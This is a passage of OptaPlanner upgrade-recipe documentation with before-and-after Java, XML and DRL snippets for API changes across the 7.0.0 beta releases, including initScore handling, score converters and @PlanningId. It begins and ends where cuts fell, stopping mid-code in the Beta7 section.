<problemStatisticType>SCORE_CALCULATION_SPEED<\/problemStatisticType>\n----\n\n\n[.upgrade-recipe-readme]\n=== `Score`: uninitialized variable count\n\nA solution's `Score` now also records the number of uninitialized variables (usually `0`), exposed as a negative `getInitScore()`.\nThis is useful in exotic cases that use multiple phases to fully initialize a solution.\nIt also prevents bugs in multithreaded use cases.\n\nWith `Score.isSolutionInitialized()`, it's now possible to quickly and reliably determine if a solution is fully initialized.\nThe method `FeasibilityScore.isFeasible()` now also checks if the solution was fully initialized during score calculation.\n
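\nFor example, a minimal sketch of guarding on initialization before using a best solution (assuming a typed `Solver<CloudBalance>`; such a guard only matters where an uninitialized intermediate solution could slip through):\n\n[source, java]\n----\nCloudBalance best = solver.getBestSolution();\n\/\/ True only if every planning variable is initialized (initScore == 0)\nif (best.getScore().isSolutionInitialized()) {\n    ...\n}\n----\n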
\n\n[.upgrade-recipe-major.upgrade-recipe-reverted]\n=== `EasyScoreCalculator`: `calculateScore()` changed\n\n*This change has been reverted in version 7.0.0.Beta6. Ignore this item if you're upgrading directly to that version or higher.*\n\nThe `EasyScoreCalculator` interface method `calculateScore(solution)` has been changed to `calculateScore(solution, initScore)`.\nChange the method signature to add the `initScore` parameter and then pass it to the `Score.valueOf()` method.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudBalancingEasyScoreCalculator implements EasyScoreCalculator<CloudBalance> {\n\n    public HardSoftScore calculateScore(CloudBalance cloudBalance) {\n        ...\n        return HardSoftScore.valueOf(hardScore, softScore);\n    }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CloudBalancingEasyScoreCalculator implements EasyScoreCalculator<CloudBalance> {\n\n    public HardSoftScore calculateScore(CloudBalance cloudBalance, int initScore) {\n        ...\n        return HardSoftScore.valueOf(initScore, hardScore, softScore);\n    }\n\n}\n----\n\nOptaPlanner keeps track of the `initScore` internally, but it needs to be passed into the `Score` creation because a `Score` is immutable by design.\n\n\n[.upgrade-recipe-minor.upgrade-recipe-reverted]\n=== `IncrementalScoreCalculator`: `calculateScore()` changed\n\n*This change has been reverted in version 7.0.0.Beta6. Ignore this item if you're upgrading directly to that version or higher.*\n\nThe `IncrementalScoreCalculator` interface method `calculateScore()` has been changed to `calculateScore(initScore)`.\nChange the method signature to add the `initScore` parameter and then pass it to the `Score.valueOf()` method.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudBalancingIncrementalScoreCalculator extends AbstractIncrementalScoreCalculator<CloudBalance> {\n\n    public HardSoftScore calculateScore() {\n        return HardSoftScore.valueOf(hardScore, softScore);\n    }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CloudBalancingIncrementalScoreCalculator extends AbstractIncrementalScoreCalculator<CloudBalance> {\n\n    public HardSoftScore calculateScore(int initScore) {\n        return HardSoftScore.valueOf(initScore, hardScore, softScore);\n    }\n\n}\n----\n\n\n[.upgrade-recipe-major.upgrade-recipe-public-api.upgrade-recipe-reverted]\n=== `Score`: `valueOf(...)` changed and `valueOfInitialized(...)` added\n\n*This change has been reverted in version 7.0.0.Beta6. 
Ignore this item if you're upgrading directly to that version or higher.*\n\nThe `Score.compareTo()` now also takes the uninitialized variable count into account.\nIf you have a `CustomPhaseCommand` that implements a custom solution initializer (instead of using a Construction Heuristic),\nit will need to transform all scores with `Score.toInitializedScore()` before comparison to avoid making the wrong decision:\n\nBefore in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand<DinnerParty> {\n ...\n\n private void initializeSeatDesignationList(ScoreDirector<DinnerParty> scoreDirector, DinnerParty dinnerParty) {\n ...\n for (SeatDesignation seatDesignation : dinnerParty.getSeatDesignationList()) {\n Score bestScore = SimpleScore.valueOf(Integer.MIN_VALUE);\n ...\n for (Seat seat : undesignatedSeatList) {\n ...\n if (score.compareTo(bestScore) > 0) {\n bestScore = score;\n ...\n }\n }\n ...\n }\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand<DinnerParty> {\n ...\n\n private void initializeSeatDesignationList(ScoreDirector<DinnerParty> scoreDirector, DinnerParty dinnerParty) {\n ...\n for (SeatDesignation seatDesignation : dinnerParty.getSeatDesignationList()) {\n Score bestScore = SimpleScore.valueOfInitialized(Integer.MIN_VALUE);\n ...\n for (Seat seat : undesignatedSeatList) {\n ...\n if (score.toInitializedScore().compareTo(bestScore.toInitializedScore()) > 0) {\n bestScore = score;\n ...\n }\n }\n ...\n }\n }\n\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `Score` and `ScoreDefinition`: methods changed\n\nThe `ScoreDefinition.fromLevelNumbers(...)` method now requires an `initScore` parameter.\n\nBefore in `*.java`:\n[source, java]\n----\nScore score = scoreDefinition.fromLevelNumbers(new int[]{0, -200});\n----\n\nAfter in `*.java` (quick and dirty fix):\n[source, java]\n----\nScore score = scoreDefinition.fromLevelNumbers(0, new int[]{0, -200});\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom `Score`: methods added\n\nIf you have a custom `Score`:\nThe `Score` interface has several new methods: `getInitScore()`, `isSolutionInitialized()`, `toInitializedScore()` and `withInitScore()`.\nThe first two methods are implemented by `AbstractScore`, but the last two methods need to be specifically implemented.\n\nBefore in `*.java`:\n[source, java]\n----\npublic final class HardSoftScore extends AbstractScore<HardSoftScore> ... {\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic final class HardSoftScore extends AbstractScore<HardSoftScore> ... {\n ...\n\n public HardSoftScore toInitializedScore() {\n return initScore == 0 ? 
this : new HardSoftScore(0, hardScore, softScore);\n    }\n\n    public HardSoftScore withInitScore(int newInitScore) {\n        assertNoInitScore();\n        return new HardSoftScore(newInitScore, hardScore, softScore);\n    }\n\n}\n----\n\nFurthermore, a score that implements `FeasibleScore` needs to take the `initScore` into account in the `isFeasible()` method implementation.\n\n\n[.upgrade-recipe-minor]\n=== Hibernate integration: extra `@Column` needed\n\nBecause a `Score` now also contains an `initScore` of type `int` (regardless of the type of the other fields),\nadd an extra `@Column` annotation to the beginning of the `@Columns` list to map that field to a database column.\n\nSet it to `0` for all existing records (unless you have reason to believe that some scores weren't calculated on a fully initialized solution).\n\nBefore in `*.java`:\n[source, java]\n----\n    @Columns(columns = {\n            @Column(name = \"hardScore\"),\n            @Column(name = \"softScore\")})\n    public HardSoftScore getScore() {\n        return score;\n    }\n----\n\nAfter in `*.java`:\n[source, java]\n----\n    @Columns(columns = {\n            @Column(name = \"initScore\"),\n            @Column(name = \"hardScore\"),\n            @Column(name = \"softScore\")})\n    public HardSoftScore getScore() {\n        return score;\n    }\n----\n\n\n[.upgrade-recipe-impl-detail]\n=== `XStreamSolutionFileIO`: no-arg constructor removed\n\nThe no-arg constructor of `XStreamSolutionFileIO` has been removed because it's useless.\n\n\n[.upgrade-recipe-minor]\n=== JAXB support added\n\nIf you're using JAXB, take advantage of the new JAXB Score bindings etc.\nSee the reference manual, chapter _Integration_.\n\nThese new `ScoreJaxbXmlAdapter` implementations have been promoted to the public API,\nso they are guaranteed to be backwards compatible in future versions.\n\n\n[.upgrade-recipe-minor]\n=== Jackson support added\n\nIf you're using Jackson, take advantage of the new Jackson Score bindings etc.\nSee the reference manual, chapter _Integration_.\n\nThese new `ScoreJacksonJsonSerializer` and `ScoreJacksonJsonDeserializer` implementations have been promoted to the public API,\nso they are guaranteed to be backwards compatible in future versions.\n\n\n[.upgrade-recipe-major]\n=== `XStreamScoreConverter` replaced\n\nThe general-purpose `XStreamScoreConverter` for binding `Score` implementations\nhas been replaced by specific implementations, such as `HardSoftScoreXStreamConverter` and `SimpleScoreXStreamConverter`,\nwhich are easier to use.\n\nFurthermore, these new `ScoreXStreamConverter` implementations have been promoted to the public API,\nso they are now guaranteed to be backwards compatible in future versions.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudBalance {\n\n    @XStreamConverter(value = XStreamScoreConverter.class, types = {HardSoftScoreDefinition.class})\n    private HardSoftScore score;\n\n    ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CloudBalance {\n\n    @XStreamConverter(HardSoftScoreXStreamConverter.class)\n    private HardSoftScore score;\n\n    ...\n}\n----\n\nFor a bendable score, it is no longer necessary to configure the `hardLevelSize` and `softLevelSize`.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class Schedule {\n\n    @XStreamConverter(value = XStreamScoreConverter.class, types = {BendableScoreDefinition.class}, ints = {1, 2})\n    private BendableScore score;\n\n    ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class Schedule {\n\n    @XStreamConverter(BendableScoreXStreamConverter.class)\n    private BendableScore score;\n\n    
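\/\/ the bendable level sizes are no longer configured on the converter (from 7.0.0.Beta2 on, they belong on the @PlanningScore annotation, see below)\n    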
...\n}\n----\n\n\n[.upgrade-recipe-major.upgrade-recipe-public-api]\n=== `@CustomShadowVariable`: `sources` type changed\n\nA shadow variable annotated with `@CustomShadowVariable`\nnow expects that the `sources` parameter is of type `@PlanningVariableReference`\ninstead of `@CustomShadowVariable.Source`.\n\nThis way it's consistent with the `variableListenerRef` parameter.\n\nBefore in `*.java`:\n[source, java]\n----\n @CustomShadowVariable(variableListenerClass = ArrivalTimeUpdatingVariableListener.class,\n sources = {@CustomShadowVariable.Source(variableName = \"previousStandstill\")})\n public Long getArrivalTime() {\n return arrivalTime;\n }\n----\n\nAfter in `*.java`:\n[source, java]\n----\n @CustomShadowVariable(variableListenerClass = ArrivalTimeUpdatingVariableListener.class,\n sources = {@PlanningVariableReference(variableName = \"previousStandstill\")})\n public Long getArrivalTime() {\n return arrivalTime;\n }\n----\n\n\n== From 7.0.0.Beta1 to 7.0.0.Beta2\n\n[.upgrade-recipe-minor]\n=== `ProblemFactChange`: `before\/afterProblemFactChanged` renamed\n\nThe `ScoreDirector` methods `beforeProblemFactChanged()` and `afterProblemFactChanged()`\nhave been renamed to `beforeProblemPropertyChanged()` and `afterProblemPropertyChanged()`.\nThis can affect your `ProblemFactChange` implementations.\n\nA problem fact is a class that doesn't change during planning.\nA problem property is a property on a problem fact or a planning entity that doesn't change during planning\n(so it's not a planning variable).\n\nBefore in `*.java`:\n[source, java]\n----\n scoreDirector.beforeProblemFactChanged(computer);\n computer.setMemory(newMemoryCapacity);\n scoreDirector.afterProblemFactChanged(computer);\n----\n\nAfter in `*.java`:\n[source, java]\n----\n scoreDirector.beforeProblemPropertyChanged(computer);\n computer.setMemory(newMemoryCapacity);\n scoreDirector.afterProblemPropertyChanged(computer);\n----\n\n\n[.upgrade-recipe-major]\n=== Solver configuration: `<scoreDefinitionType>` removed\n\nDon't specify the `scoreDefinitionType` in the solver configuration any more\nbecause OptaPlanner will now figure it out automatically from the domain.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <scoreDirectorFactory>\n <scoreDefinitionType>HARD_SOFT<\/scoreDefinitionType>\n <scoreDrl>org\/optaplanner\/examples\/cloudbalancing\/solver\/cloudBalancingScoreRules.drl<\/scoreDrl>\n <\/scoreDirectorFactory>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <scoreDirectorFactory>\n <scoreDrl>org\/optaplanner\/examples\/cloudbalancing\/solver\/cloudBalancingScoreRules.drl<\/scoreDrl>\n <\/scoreDirectorFactory>\n----\n\nFor a bendable score, also move the `bendableHardLevelsSize` and `bendableSoftLevelsSize` lines from the solver configuration XML\ninto the `@PlanningScore` annotation on your domain class.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <scoreDirectorFactory>\n <scoreDefinitionType>BENDABLE<\/scoreDefinitionType>\n <bendableHardLevelsSize>1<\/bendableHardLevelsSize>\n <bendableSoftLevelsSize>2<\/bendableSoftLevelsSize>\n <scoreDrl>org\/optaplanner\/examples\/projectjobscheduling\/solver\/projectJobSchedulingScoreRules.drl<\/scoreDrl>\n <\/scoreDirectorFactory>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <scoreDirectorFactory>\n <scoreDrl>org\/optaplanner\/examples\/projectjobscheduling\/solver\/projectJobSchedulingScoreRules.drl<\/scoreDrl>\n 
<\/scoreDirectorFactory>\n----\n\nBefore in `*.java`:\n[source, java]\n----\n    @PlanningScore\n    private BendableScore score;\n----\n\nAfter in `*.java`:\n[source, java]\n----\n    @PlanningScore(bendableHardLevelsSize = 1, bendableSoftLevelsSize = 2)\n    private BendableScore score;\n----\n\nIn the rare case that you're using a custom score, also move its declaration into the domain:\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n    <scoreDefinitionClass>...MyCustomScoreDefinition<\/scoreDefinitionClass>\n----\n\nAfter in `*.java`:\n[source, java]\n----\n    @PlanningScore(scoreDefinitionClass = MyCustomScoreDefinition.class)\n----\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== `@PlanningVariable` on primitive types: no longer supported\n\nA `@PlanningVariable` annotation on a primitive type such as `int` or `long` (instead of `Integer` or `Long`)\nnow fails fast instead of causing an inferior result.\nThe use of a primitive type caused the Construction Heuristics to presume the variable is already initialized\n(because it's not null and might be a form of Repeated Planning),\nwhich led to inferior results.\nIt was hard for many users to diagnose the cause of that issue, so now this inferior approach fails fast with a clear message.\n\nBefore in `*.java`:\n[source, java]\n----\n    private int delay;\n\n    @PlanningVariable(valueRangeProviderRefs = {\"delayRange\"})\n    public int getDelay() {\n        return delay;\n    }\n\n    public void setDelay(int delay) {\n        this.delay = delay;\n    }\n----\n\nAfter in `*.java`:\n[source, java]\n----\n    private Integer delay;\n\n    @PlanningVariable(valueRangeProviderRefs = {\"delayRange\"})\n    public Integer getDelay() {\n        return delay;\n    }\n\n    public void setDelay(Integer delay) {\n        this.delay = delay;\n    }\n----\n\n\n[.upgrade-recipe-minor]\n=== `VariableListener` events are no longer unique\n\nOptaPlanner might call the `before...` and `after...` methods on your `VariableListener` implementation\ntwice with the exact same parameters.\nMost `VariableListener` implementations can deal with this,\ngetting a small performance boost because OptaPlanner doesn't have to guarantee uniqueness.\nIf your implementation can't deal with it, then override the `requiresUniqueEntityEvents()` method.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class StartTimeUpdatingVariableListener implements VariableListener<Task> {\n\n    ...\n}\n----\n\nAfter in `*.java` (optional):\n[source, java]\n----\npublic class StartTimeUpdatingVariableListener implements VariableListener<Task> {\n\n    @Override\n    public boolean requiresUniqueEntityEvents() {\n        \/\/ If you don't need to override this method, you get a small performance gain\n        return true;\n    }\n\n    ...\n}\n----\n\n\n[.upgrade-recipe-recommended]\n=== Faster and nicer `accumulate()` in `drl`\n\nDrools now uses typed `sum()`, `min()`, `max()` and `avg()` functions in `accumulate()` patterns.\nThis means that a sum of ints is now an int (instead of a double) and a sum of BigDecimals is now a BigDecimal (without rounding errors).\nThis is faster and it also gets rid of the `intValue()` conversions.\n\nMeanwhile, also take advantage of migrating to the clearer `accumulate` form, if you haven't already.\n\nBefore in `*.drl`:\n[source, drl]\n----\nrule \"requiredCpuPowerTotal\"\n    when\n        $c : CloudComputer($capacity : cpuPower)\n        $total : Number(intValue > $capacity) from accumulate(\n            CloudProcess(\n                computer == $c,\n                $required : requiredCpuPower),\n            sum($required)\n        )\n    then\n        
scoreHolder.addHardConstraintMatch(kcontext, $capacity - $total.intValue());\nend\n----\n\nAfter in `*.drl`:\n[source, drl]\n----\nrule \"requiredCpuPowerTotal\"\n when\n $c : CloudComputer($capacity : cpuPower)\n accumulate(\n CloudProcess(\n computer == $c,\n $required : requiredCpuPower);\n $total : sum($required);\n $total > $capacity\n )\n then\n scoreHolder.addHardConstraintMatch(kcontext, $capacity - $total);\nend\n----\n\nNotice that the pattern, the function list and the DRL constraint list in the `accumulate()`\nare recommended to be separated by a `;` character instead of a `,` character.\n\n\n[.upgrade-recipe-minor]\n=== Custom `Score`: implement `isCompatibleArithmeticArgument()`\n\nAn `AbstractScore` no longer implements the `Score` interface method `isCompatibleArithmeticArgument()` (which is still there).\nNow, your custom `Score` implementation needs to implement it itself.\n\nThis way, `Score` instances can be reused by GWT and other JavaScript generating code.\n\nBefore in `*.java`:\n[source, java]\n----\npublic final class HardSoftScore extends AbstractScore<HardSoftScore> {\n ...\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic final class HardSoftScore extends AbstractScore<HardSoftScore> {\n ...\n\n @Override\n public boolean isCompatibleArithmeticArgument(Score otherScore) {\n return otherScore instanceof HardSoftScore;\n }\n\n}\n----\n\n\n== From 7.0.0.Beta2 to 7.0.0.Beta3\n\n[.upgrade-recipe-minor]\n=== `Solver.getScoreDirectorFactory`: call `ScoreDirector.dispose()`\n\nEvery `ScoreDirector` needs to be disposed to avoid a potential memory leak.\nThe old docs didn't clearly mention that, so your code might not do that.\n\nBefore in `*.java`:\n[source, java]\n----\nScoreDirectorFactory<CloudBalance> scoreDirectorFactory = solver.getScoreDirectorFactory();\nScoreDirector<CloudBalance> guiScoreDirector = scoreDirectorFactory.buildScoreDirector();\n...\n----\n\nAfter in `*.java`:\n[source, java]\n----\nScoreDirectorFactory<CloudBalance> scoreDirectorFactory = solver.getScoreDirectorFactory();\nScoreDirector<CloudBalance> guiScoreDirector = scoreDirectorFactory.buildScoreDirector();\n...\nguiScoreDirector.dispose();\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom cloning: `PlanningCloneable` replaced\n\nThe interface `PlanningCloneable` has been removed,\nuse a `SolutionCloner` instead.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class NQueens implements PlanningCloneable<NQueens> {\n ...\n\n public NQueens planningClone() {\n ...\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class NQueensSolutionCloner implements SolutionCloner<NQueens> {\n\n @Override\n public NQueens cloneSolution(CloneLedger ledger, NQueens original) {\n ...\n }\n\n}\n----\n\n[source, java]\n----\n@PlanningSolution(solutionCloner = NQueensSolutionCloner.class)\npublic class NQueens {\n ...\n}\n----\n\n\n== From 7.0.0.Beta3 to 7.0.0.Beta4\n\n[.upgrade-recipe-recommended]\n=== Add `@PlanningId` annotation\n\nIt is recommended to add a `@PlanningId` annotation\non the unique ID of every planning entity and on most problem fact classes\n(especially on each class that is a planning value class).\nThe ID must never be null and must be unique per class (no need to be globally unique).\n\nThis enables the use of multithreaded solvers (such as Partitioned Search)\nand makes it easier to implement a real-time planning `ProblemFactChange` by using `ScoreDirector.lookUpWorkingObject()`.\n\nBefore in `*.java`:\n[source, java]\n----\npublic abstract class 
AbstractPersistable ... {\n\n    protected Long id; \/\/ Can also be a String, Integer, ...\n\n    public Long getId() {\n        return id;\n    }\n\n    ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic abstract class AbstractPersistable ... {\n\n    protected Long id; \/\/ Can also be a String, Integer, ...\n\n    @PlanningId\n    public Long getId() {\n        return id;\n    }\n\n    ...\n}\n----\n\nYou can also put the `@PlanningId` annotation on the field instead.\n\n\n[.upgrade-recipe-minor]\n=== `ProblemFactChange`: Use `lookUpWorkingObject()`\n\nUse the new method `ScoreDirector.lookUpWorkingObject(Object)` to translate a planning entity or problem fact\nto the corresponding working instance (its planning clone) more efficiently.\n\nThis requires that the class has a `@PlanningId` annotation on one of its getters or fields.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class EditComputerProblemFactChange implements ProblemFactChange<CloudBalance> {\n\n    private final CloudComputer changedComputer;\n    ...\n\n    public void doChange(ScoreDirector<CloudBalance> scoreDirector) {\n        CloudComputer workingComputer = null;\n        for (CloudComputer computer : cloudBalance.getComputerList()) {\n            if (changedComputer.getId().equals(computer.getId())) {\n                workingComputer = computer;\n                break;\n            }\n        }\n\n        scoreDirector.beforeProblemPropertyChanged(workingComputer);\n        workingComputer.setCpuPower(changedComputer.getCpuPower());\n        scoreDirector.afterProblemPropertyChanged(workingComputer);\n        ...\n        scoreDirector.triggerVariableListeners();\n    }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class EditComputerProblemFactChange implements ProblemFactChange<CloudBalance> {\n\n    private final CloudComputer changedComputer;\n    ...\n\n    public void doChange(ScoreDirector<CloudBalance> scoreDirector) {\n        CloudComputer workingComputer = scoreDirector.lookUpWorkingObject(changedComputer);\n\n        scoreDirector.beforeProblemPropertyChanged(workingComputer);\n        workingComputer.setCpuPower(changedComputer.getCpuPower());\n        scoreDirector.afterProblemPropertyChanged(workingComputer);\n        ...\n        scoreDirector.triggerVariableListeners();\n    }\n\n}\n----\n\n\n== From 7.0.0.Beta5 to 7.0.0.Beta6\n\n[.upgrade-recipe-minor]\n=== Benchmarker warms up by default\n\nIt is no longer necessary to explicitly configure a warm-up time for the benchmarks.\nThe benchmarker now warms up for 30 seconds by default.\n\nBefore in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n<plannerBenchmark>\n  ...\n  <warmUpSecondsSpentLimit>30<\/warmUpSecondsSpentLimit>\n  ...\n<\/plannerBenchmark>\n----\n\nAfter in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n<plannerBenchmark>\n  ...\n<\/plannerBenchmark>\n----\n\nTo disable the warm-up, explicitly set it to 0:\n[source, xml]\n----\n<plannerBenchmark>\n  ...\n  <warmUpSecondsSpentLimit>0<\/warmUpSecondsSpentLimit>\n  ...\n<\/plannerBenchmark>\n----\n\n\n[.upgrade-recipe-minor]\n=== `CustomPhaseCommand`: method `applyCustomProperties()` replaced\n\nThe `CustomPhaseCommand` no longer has the method `applyCustomProperties()`.\nIf you have custom properties in your solver configuration,\nsimply implement a public setter for each custom property.\nThe supported types for a setter currently include booleans, numbers and strings.\n\nSimilar custom-property support is available on some other custom classes (such as `SolutionPartitioner`).\n\nBefore in `*.java`:\n[source, java]\n----\npublic class MyCustomPhaseCommand extends AbstractCustomPhaseCommand {\n\n    private int mySelectionSize;\n\n    @Override\n    public void applyCustomProperties(Map<String, String> 
customPropertyMap) {\n String mySelectionSizeString = customPropertyMap.get(\"mySelectionSize\");\n try {\n mySelectionSize = mySelectionSizeString == null ? 10 : Integer.parseInt(mySelectionSizeString);\n } catch (NumberFormatException e) {\n throw new IllegalArgumentException(\"The mySelectionSize (\" + mySelectionSizeString + \") cannot be parsed.\", e);\n }\n ...\n }\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class MyCustomPhaseCommand extends AbstractCustomPhaseCommand {\n\n private int mySelectionSize = 10;\n\n @SuppressWarnings(\"unused\")\n public void setMySelectionSize(int mySelectionSize) {\n this.mySelectionSize = mySelectionSize;\n }\n\n ...\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `Bendable*Score`: method `isFeasible()` fixed\n\nA bendable score with at least 2 hard score levels is now infeasible\nif any of those hard levels is negative, even if another hard level is positive (1 or higher).\n
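\nFor example, a minimal sketch of the fixed behaviour, assuming a score definition with 2 hard levels and 1 soft level and the `BendableScore.valueOf(int[], int[])` factory method:\n[source, java]\n----\n \/\/ Hard level 0 is positive, but hard level 1 is negative:\n BendableScore score = BendableScore.valueOf(new int[]{5, -2}, new int[]{-10});\n \/\/ Feasible only if every hard level is 0 or higher, so this is now infeasible:\n boolean feasible = score.isFeasible(); \/\/ false\n----\n\n\n[.upgrade-recipe-minor]\n=== `EasyScoreCalculator`: `calculateScore()` reverted to 6.x style\n\n*This change reverts a change of 7.0.0.Beta1. Ignore this item if you're upgrading directly from version 6.*\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudBalancingEasyScoreCalculator implements EasyScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore(CloudBalance cloudBalance, int initScore) {\n ...\n return HardSoftScore.valueOf(initScore, hardScore, softScore);\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CloudBalancingEasyScoreCalculator implements EasyScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore(CloudBalance cloudBalance) {\n ...\n return HardSoftScore.valueOf(hardScore, softScore);\n }\n\n}\n----\n\nOptaPlanner still keeps track of the `initScore` internally.\n\n\n[.upgrade-recipe-minor]\n=== `IncrementalScoreCalculator`: `calculateScore()` reverted to 6.x style\n\n*This change reverts a change of 7.0.0.Beta1. Ignore this item if you're upgrading directly from version 6.*\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudBalancingIncrementalScoreCalculator extends AbstractIncrementalScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore(int initScore) {\n return HardSoftScore.valueOf(initScore, hardScore, softScore);\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CloudBalancingIncrementalScoreCalculator extends AbstractIncrementalScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore() {\n return HardSoftScore.valueOf(hardScore, softScore);\n }\n\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `Score`: `valueOf(...)` and `valueOfInitialized(...)` reverted to 6.x style\n\n*This change reverts a change of 7.0.0.Beta1. Ignore this item if you're upgrading directly from version 6.*\n\nBefore in `*.java`:\n[source, java]\n----\n SimpleScore score = SimpleScore.valueOfInitialized(1234);\n----\n\nAfter in `*.java`:\n[source, java]\n----\n SimpleScore score = SimpleScore.valueOf(1234);\n----\n\nOr with a `HardSoftScore`:\n\nBefore in `*.java`:\n[source, java]\n----\n HardSoftScore score = HardSoftScore.valueOfInitialized(1200, 34);\n----\n\nAfter in `*.java`:\n[source, java]\n----\n HardSoftScore score = HardSoftScore.valueOf(1200, 34);\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom initializer: `Score.compareTo()` behaviour reverted to 6.x style\n\n*This change reverts a change of 7.0.0.Beta1. 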
Ignore this item if you're upgrading directly from version 6.*\n\nBefore in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand<DinnerParty> {\n ...\n\n private void initializeSeatDesignationList(ScoreDirector<DinnerParty> scoreDirector, DinnerParty dinnerParty) {\n ...\n for (SeatDesignation seatDesignation : dinnerParty.getSeatDesignationList()) {\n Score bestScore = SimpleScore.valueOfInitialized(Integer.MIN_VALUE);\n ...\n for (Seat seat : undesignatedSeatList) {\n ...\n if (score.toInitializedScore().compareTo(bestScore.toInitializedScore()) > 0) {\n bestScore = score;\n ...\n }\n }\n ...\n }\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand<DinnerParty> {\n ...\n\n private void initializeSeatDesignationList(ScoreDirector<DinnerParty> scoreDirector, DinnerParty dinnerParty) {\n ...\n for (SeatDesignation seatDesignation : dinnerParty.getSeatDesignationList()) {\n Score bestScore = SimpleScore.valueOf(Integer.MIN_VALUE);\n ...\n for (Seat seat : undesignatedSeatList) {\n ...\n if (score.compareTo(bestScore) > 0) {\n bestScore = score;\n ...\n }\n }\n ...\n }\n }\n\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom `Move`: added optional generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation,\n`Move` and `AbstractMove` now optionally support a generic type parameter (which is the solution class).\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudComputerChangeMove extends AbstractMove {\n\n @Override\n public boolean isMoveDoable(ScoreDirector scoreDirector) {\n return !Objects.equals(cloudProcess.getComputer(), toCloudComputer);\n }\n\n @Override\n public Move createUndoMove(ScoreDirector scoreDirector) {\n return new CloudComputerChangeMove(cloudProcess, cloudProcess.getComputer());\n }\n\n @Override\n protected void doMoveOnGenuineVariables(ScoreDirector scoreDirector) {\n scoreDirector.beforeVariableChanged(cloudProcess, \"computer\");\n cloudProcess.setComputer(toCloudComputer);\n scoreDirector.afterVariableChanged(cloudProcess, \"computer\");\n }\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CloudComputerChangeMove extends AbstractMove<CloudBalance> {\n\n @Override\n public boolean isMoveDoable(ScoreDirector<CloudBalance> scoreDirector) {\n return !Objects.equals(cloudProcess.getComputer(), toCloudComputer);\n }\n\n @Override\n public CloudComputerChangeMove createUndoMove(ScoreDirector<CloudBalance> scoreDirector) {\n return new CloudComputerChangeMove(cloudProcess, cloudProcess.getComputer());\n }\n\n @Override\n protected void doMoveOnGenuineVariables(ScoreDirector<CloudBalance> scoreDirector) {\n scoreDirector.beforeVariableChanged(cloudProcess, \"computer\");\n cloudProcess.setComputer(toCloudComputer);\n scoreDirector.afterVariableChanged(cloudProcess, \"computer\");\n }\n\n ...\n}\n----\n\n\n== From 7.0.0.Beta6 to 7.0.0.Beta7\n\n[.upgrade-recipe-major.upgrade-recipe-public-api]\n=== `ConstraintMatch(Total)`: `getWeightTotal()` and `getWeight()` replaced\n\nWhen explaining a score through `ScoreDirector.getConstraintMatchTotals()`,\nthe `ConstraintMatchTotal` and `ConstraintMatch` instances now have a `Score`\ninstead of an `int scoreLevel` and a `Number weight`.\n\nThis simplifies the API and allows the reuse of `ConstraintMatch` in the indictment API.\n\nBefore in `*.java`:\n[source, java]\n----\n for (ConstraintMatchTotal constraintMatchTotal : 
